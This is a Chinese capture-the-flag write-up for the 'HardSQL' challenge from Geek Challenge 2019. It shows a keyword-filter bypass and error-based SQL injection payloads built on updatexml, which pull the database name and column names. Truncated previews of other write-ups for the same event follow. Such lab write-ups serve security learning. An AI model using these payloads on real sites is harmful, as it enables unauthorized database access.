極客大挑戰 2019 HardSQL 1

2022-10-08 22:18:25 字數 1049 閱讀 4781

開啟靶場環境

沒錯又是他,還是嘗試萬能密碼

大致有and || * union = substr mid和空格

mid() 函式用於從文字欄位中提取字元。

substr() 函式返回字串的一部分。

left ()函式是指從文字的左側第乙個字元開始提取指定數量的字元。left函式用法:=left(內容,提取多少字元)

right()見上

但是發現他有報錯,而且updatexml沒有過濾,嘗試用報錯注入,用)替換空格

username=1&password=1'or(updatexml(1,concat(0x7e,database(),0x7e),1))%23(這個地方還可以用^來替換or來鏈結函式)爆出資料庫

爆表名username=1&password=1'or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('h4rdsq1')),0x7e),1))%23

like 操作符用於在 where 子句中搜尋列中的指定模式。

(注意right的使用)

成功

極客大挑戰 2019 PHP

開啟以後,是三個php原始碼,其中最重要的是class.php,如下 include flag.php error reporting 0 class name function wakeup function destruct if this username admin else 看了一下,這個...

極客大挑戰 2019 HardSQL wp

有過濾,抓個包fuzz一下 等號,空格等被過濾 發現可以用報錯注入,空格可以用括號代替 查表名username admin or extractvalue 1,concat 0x7e,select group concat column name from information schema.co...

極客大挑戰 2019 PHP

剛進入 我們可以看到這樣的乙個介面 根據內容提示,有備份 的習慣 日常後台掃瞄,發現有www.zip檔案,我們進行解壓得到 看到flag.php開啟檢視,發現沒有什麼有用的資訊。我們開啟index.php看看 我們可以看到通過get方式傳入引數select,並對引數select進行反序列化。接下來,...